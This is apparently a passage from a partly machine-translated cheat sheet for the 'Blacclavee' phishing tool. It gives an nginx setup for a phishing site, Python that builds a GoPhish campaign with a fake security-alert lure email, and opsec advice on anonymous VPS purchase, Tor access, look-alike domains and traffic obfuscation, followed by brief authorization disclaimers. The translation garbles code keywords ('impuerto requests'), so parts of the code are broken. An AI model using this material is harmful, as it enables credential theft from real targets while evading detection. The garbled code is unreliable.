listen 80;
server_name phishing.ejemplo.com;
root /path/to/blacclavee/templates/selected;
index index.html index.php;
location ~ \.php$ \\\\{
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
\\\\}
access_log /var/log/nginx/blacclavee_access.log;
error_log /var/log/nginx/blacclavee_error.log;
\\\\}
EOF
# Enable site
sudo ln -s /etc/nginx/sites-available/blacclavee /etc/nginx/sites-enabled/
sudo systemctl reload nginx
GoPhish Integration
# Integrate Blacclavee with GoPhish for email delivery
impuerto requests
impuerto json
def create_gophish_campaign_with_blacclavee(blacclavee_url):
"""Create GoPhish campaign using Blacclavee URL"""
gophish_api_url = "http://localhost:3333/api"
api_clave = "your_gophish_api_clave"
headers = \\\\{
'autorización': f'Bearer \\\\{api_clave\\\\}',
'Content-Type': 'application/json'
\\\\}
# Create email template
template_data = \\\\{
"name": "Blacclavee Social Media Campaign",
"subject": "Account Security Alert",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected suspicious activity on your account.</p>
<p>Please verify your identity immediately:</p>
<p><a href="\\\\{blacclavee_url\\\\}" style="background-color: #007bff; color: white; padding: 10px 20px; text-decoration: none;">Verify Account</a></p>
</body>
</html>
""",
"text": f"Please verify your account: \\\\{blacclavee_url\\\\}"
\\\\}
# Create campaign
campaign_data = \\\\{
"name": "Blacclavee Integration Campaign",
"template": template_data,
"url": blacclavee_url,
"groups": [\\\\{"name": "objetivo Group"\\\\}]
\\\\}
response = requests.post(
f"\\\\{gophish_api_url\\\\}/campaigns",
headers=headers,
json=campaign_data
)
return response.json()
# uso
blacclavee_url = "https://your-ngrok-url.ngrok.io"
campaign = create_gophish_campaign_with_blacclavee(blacclavee_url)
print(f"Campaign created: \\\\{campaign\\\\}")
Operational Security
Infrastructure Security
# Use VPS with anonymous payment
# Setup through Tor/VPN
# Use legitimate domain names
# Implement SSL certificados
# ejemplo secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Access through Tor browser
# 3. Register domain with privacy protection
# 4. Setup Let's Encrypt SSL
# 5. Configure proper logging
Domain and SSL Setup
# Register legitimate-looking domain
# ejemplo: account-security-verification.com
# Setup Let's Encrypt SSL
sudo apt install certbot python3-certbot-apache
sudo certbot --apache -d your-domain.com
# Or manual certificado
sudo certbot certonly --manual -d your-domain.com
Traffic Obfuscation
# Use CDN servicios
# Implement realistic timing delays
# Use common puertos (80, 443)
# Mimic legitimate traffic patterns
# ejemplo CloudFlare setup
# 1. Add domain to CloudFlare
# 2. Configure DNS records
# 3. Enable proxy (orange cloud)
# 4. Configure security settings
solución de problemas
Common Issues
# Permission denied
chmod +x blacclavee.sh
# PHP not found
sudo apt install php php-cli
# puerto already in use
sudo netstat -tulpn|grep :80
sudo kill -9 $(sudo lsof -t -i:80)
# Template not loading
# Check file permissions
# Verify PHP configuración
# Test with curl
# Ngrok autenticación failed
ngrok authtoken YOUR_token
Debug Mode
# Enable PHP error repuertoing
echo "error_repuertoing = E_ALL" >> /etc/php/7.4/cli/php.ini
echo "display_errors = On" >> /etc/php/7.4/cli/php.ini
# Check Apache/Nginx logs
tail -f /var/log/apache2/error.log
tail -f /var/log/nginx/error.log
# Test template manually
php -S localhost:8000 -t /path/to/template/
Best Practices
Campaign Planning
- objetivo research: Understand objetivo demographics and platform uso
- Template selection: Choose appropriate templates for objetivo audience
- Infrastructure setup: Use secure and anonymous hosting
- Testing: Thoroughly test templates before deployment
- Monitoring: Implement real-time capture monitoring
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorización
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured credenciales
# Secure data transmission
# Implement data retention policies
# Regular security audits
Performance Optimization
# Optimize for high traffic
# Use CDN for static content
# Implement caching
# Monitor server resources
# Scale horizontally if needed
Resources
- Blacclavee GitHub Repository
- thelinuxchoice Security Tools
- PHP documentación
- Ngrok documentación
- OWASP phishing Guide
This hoja de trucos provides a comprehensive reference for using Blacclavee phishing tool. Always ensure you have proper autorización before conducting phishing simulations or pruebas de penetración.